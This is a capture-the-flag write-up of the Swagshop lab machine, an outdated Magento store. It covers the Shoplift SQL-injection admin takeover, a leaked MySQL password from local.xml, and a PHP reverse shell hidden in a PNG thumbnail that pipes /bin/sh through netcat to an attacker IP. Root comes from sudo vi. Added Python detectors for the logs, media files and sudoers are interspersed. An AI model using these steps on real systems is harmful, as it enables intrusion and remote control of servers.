Swagshop - 10.10.10.140

Difficulty score: 6

Write-up by Andrea Melis @wild_boar

USER

Reconnaissance

NMAP

As usual, we start with an Nmap scan:

root@pentestbox:~# nmap -sC -sV -oA swag 10.10.10.140

# Nmap 7.70 scan initiated Thu May 16 14:35:32 2019 as: nmap -sC -sV -p- -oA swag 10.10.10.140
Nmap scan report for 10.10.10.140
Host is up (0.032s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 b6:55:2b:d2:4e:8f:a3:81:72:61:37:9a:12:f6:24:ec (RSA)
|   256 2e:30:00:7a:92:f0:89:30:59:c1:77:56:ad:51:c0:ba (ECDSA)
|_  256 4c:50:d5:f2:70:c5:fd:c4:b2:f0:bc:42:20:32:64:34 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Home page
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 16 14:36:21 2019 -- 1 IP address (1 host up) scanned in 49.94 seconds

Only port 80 looks interesting, so let's see what it serves.

Apparently it is a Magento installation.

Let's use dirb as usual to look for interesting files.

DirBuster

With DirBuster and the big.txt wordlist we found some interesting files, such as:

File found: /index.php - 200
Dir found: /css/ - 200
File found: /app/etc/local.xml

Looking at local.xml, there are some MySQL credentials, which we will keep in case they are needed later:


root
fMVWh7bDHpgZkyfqQXreTjU9

So let's see if there is something interesting in Magento, which is a well-known CMS for e-commerce solutions.

I know magescan, a tool for enumerating this CMS, but apparently it found no interesting results.

So the next step is to look for known exploits for this version, which by the way Magento showed to be 1.9.0.0 or 1.9.0.1.

Exploits

After a bit of research on searchsploit and exploit-db I found one that seems interesting.

It's a SQL injection on the admin path /admin/Cms_Wysiwyg/directive/index/, and the PoC of the exploit creates a new user with admin privileges, as pointed out in the exploit's header:

##################################################################################################
#Exploit Title : Magento Shoplift exploit (SUPEE-5344)
#Author        : Manish Kishan Tanwar AKA error1046
#Date          : 25/08/2015
#Love to       : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Jagriti,Kishan Singh and ritu rathi
#Debugged At  : Indishell Lab(originally developed by joren)
##################################################################################################

#////////////////////////
#/// Overview:
#////////////////////////
#
#Magento shoplift bug originally discovered by CheckPoint team (http://blog.checkpoint.com/2015/04/20/analyzing-magento-vulnerability/)
#This python script developed by joren but it was having some bug because of which it was not working properly.
#If magento version is vulnerable, this script will create admin account with username forme and password forme

The exploit worked! We just needed to change the base URL from “http://10.10.10.140” to “http://10.10.10.140/index.php”, because it seems that mod_rewrite is working.

So that’s it!


python 37977.py
WORKED
Check http://10.10.10.140/index.php/admin with creds forme:forme

We can now go to the admin login page and log in with the creds forme:forme.

And this is the admin panel.
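As an added example (not part of the original write-up), a small Python detector that scans Apache access-log lines for the two indicators seen so far: reads of /app/etc/local.xml and requests to the Shoplift endpoint, normalising the /index.php prefix the exploit needed. The log lines are constructed samples, not captured from the box.

```python
import re
from urllib.parse import urlsplit

# Apache combined-log fields we need: client IP, request line and status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) '
)

# Paths from the write-up: the exposed config file and the Shoplift (SUPEE-5344) endpoint.
WATCHED_PATHS = {
    "/app/etc/local.xml": "config-leak",
    "/admin/cms_wysiwyg/directive/index": "shoplift",
}

def normalise_path(target: str) -> str:
    """Lower-case the path and drop a leading /index.php so that the rewritten
    and non-rewritten forms of the same URL compare equal."""
    path = urlsplit(target).path.lower().rstrip("/")
    if path.startswith("/index.php"):
        path = path[len("/index.php"):]
    return path or "/"

def find_magento_attacks(lines):
    """Return (ip, tag, method, status) for every request that hits a watched
    path; the status tells whether the attempt got through (2xx) or was blocked."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = normalise_path(m["target"])
        for watched, tag in WATCHED_PATHS.items():
            if path.startswith(watched):
                hits.append((m["ip"], tag, m["method"], int(m["status"])))
    return hits

# Constructed sample log lines (not captured from the target).
SAMPLE_LOG = [
    '10.10.14.42 - - [16/May/2019:14:40:01 +0000] "GET / HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '10.10.14.42 - - [16/May/2019:14:40:05 +0000] "GET /app/etc/local.xml HTTP/1.1" 200 2048 "-" "curl/7.64.0"',
    '10.10.14.42 - - [16/May/2019:14:41:10 +0000] "POST /index.php/admin/Cms_Wysiwyg/directive/index/ HTTP/1.1" 200 412 "-" "python-requests/2.21.0"',
    '10.10.14.42 - - [16/May/2019:14:41:12 +0000] "GET /index.php/admin HTTP/1.1" 200 8800 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, tag, method, status in find_magento_attacks(SAMPLE_LOG):
        print(f"{tag}: {method} from {ip} -> HTTP {status}")
```

A 200 on the config-leak line is itself the finding: Magento's shipped .htaccess is supposed to deny access to app/etc.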

Reverse Shell

We can now upload a reverse shell using the Magento Connect Manager.

I've used the LavaMagentoBD project, which does exactly this, so I don't need to create a package from scratch.

DAMN! The vulnerability has been patched, so we have to find another way!

Surfing the web I found this great article describing another way in through Magento.

https://www.foregenix.com/blog/anatomy-of-a-magento-attack-froghopper

So I followed the steps it suggests.

First of all, with the admin credentials, I enable the symlink option:

System –> Configuration THEN Advanced –> Developer THEN Template Settings –> Allow Symlinks

Magento shows a warning, which is no problem of course.

Then we take a random .png image and inject this PHP shell into it, also renaming the png with a double extension, shell.php.png:


echo '<?php' >> shell.php.png
echo 'passthru("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.42 1337 >/tmp/f");' >> shell.php.png
echo '?>' >> shell.php.png

Now we have to create a new category with a thumbnail:

Catalog –> Manage Categories, then add a new one, give it a name, enable it, and add your image as its thumbnail:

So now finally, we can run our reverse shell.

All we need to do is go to the newsletter templates, create a new one with the payload, and then preview it!

Catalog –> Manage Categories

And then the payload, shell.php.png:

Save it, then preview it, and we have our reverse shell!
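An added defensive check, not from the write-up or the Froghopper article: a Python scanner that walks a Magento media directory and flags uploaded "images" that carry a PHP token in a double extension or a PHP open tag in their bytes, the two properties of the shell.php.png file above. The sample tree is constructed in a temporary directory with a harmless placeholder instead of a real payload.

```python
import os
import re
import tempfile

# A PHP token in a non-final extension, or PHP code inside an "image", is what
# turns a category thumbnail into executable code once a template includes it.
PHP_TOKENS = {"php", "phtml", "php5", "php7", "phar"}
IMAGE_EXTS = {"png", "jpg", "jpeg", "gif"}
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)

def suspicious_reasons(path: str) -> list:
    """Why an uploaded image is suspect: a PHP token hidden in a double
    extension (shell.php.png) and/or a PHP open tag in the file bytes."""
    reasons = []
    exts = os.path.basename(path).lower().split(".")[1:]
    if exts and exts[-1] in IMAGE_EXTS and PHP_TOKENS.intersection(exts[:-1]):
        reasons.append("double-extension")
    with open(path, "rb") as fh:
        head = fh.read(64 * 1024)
    if PHP_OPEN_TAG.search(head):
        reasons.append("php-open-tag")
    return reasons

def scan_media(root: str) -> dict:
    """Walk a Magento media tree; map each suspicious file to its reasons."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            reasons = suspicious_reasons(full)
            if reasons:
                findings[os.path.relpath(full, root)] = reasons
    return findings

def build_sample_tree() -> str:
    """Constructed sample: one plain PNG and one disguised PHP file (harmless)."""
    root = tempfile.mkdtemp()
    cat = os.path.join(root, "catalog", "category")
    os.makedirs(cat)
    with open(os.path.join(cat, "banner.png"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
    with open(os.path.join(cat, "shell.php.png"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n<?php echo 'placeholder'; ?>")
    return root

if __name__ == "__main__":
    for rel, why in scan_media(build_sample_tree()).items():
        print(rel, "->", ", ".join(why))
```

Running this over media/catalog/category on a real install, together with checking that Allow Symlinks is off, covers both halves of the technique described above.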

ROOT

Enumeration

Immediately after launching LinEnum we noticed something strange in the sudoers file.

Apparently www-data is able to run /usr/bin/vi with sudo on every file in /var/www/html/.

So we can simply open a file in that folder with sudo, spawn bash from vi, and that's it!

We have a root shell!
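An added example, not from the write-up: a Python audit of sudoers rules that flags the pattern found here, a non-root user allowed to run an editor (vi) via sudo, together with wildcard paths and NOPASSWD. The sudoers excerpt is constructed, and the list of shell-escaping binaries is an assumption (editors and pagers commonly known to offer shell escapes).

```python
import re

# Programs that hand the sudo caller an interactive shell (editors and pagers
# have shell escapes); assumed list, the write-up's case is vi.
SHELL_ESCAPE_BINS = {"vi", "vim", "view", "nano", "less", "more", "man", "sh", "bash"}

# Minimal sudoers rule grammar: user host=(runas) [TAG:] command, command, ...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?"
    r"(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$"
)

def audit_sudoers(text: str) -> list:
    """Return (user, command, reasons) for each non-root rule whose command can
    spawn a shell (or is ALL), uses a wildcard, or is granted NOPASSWD."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        m = RULE_RE.match(line) if line and not line.startswith("Defaults") else None
        if not m or m["user"] == "root":
            continue
        nopasswd = "NOPASSWD" in m["tags"]
        for cmd in (c.strip() for c in m["cmds"].split(",") if c.strip()):
            prog = cmd.split()[0]
            reasons = []
            if prog == "ALL" or prog.rsplit("/", 1)[-1] in SHELL_ESCAPE_BINS:
                reasons.append("shell-escape")   # fix: sudoedit or a restricted wrapper
            if "*" in cmd:
                reasons.append("wildcard")       # fix: list the exact files instead
            if reasons and nopasswd:
                reasons.append("nopasswd")
            if reasons:
                findings.append((m["user"], cmd, reasons))
    return findings

# Constructed sudoers excerpt (not the target's real file).
SAMPLE_SUDOERS = """\
Defaults env_reset
root ALL=(ALL:ALL) ALL
%backup ALL=(root) NOPASSWD: /usr/bin/rsync -a /srv/ /mnt/backup/
www-data ALL=NOPASSWD: /usr/bin/vi /var/www/html/*
"""

if __name__ == "__main__":
    for user, cmd, why in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{user}: {cmd} [{', '.join(why)}]")
```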

Thank you for reading this write-up. Feedback is appreciated! Happy hacking :)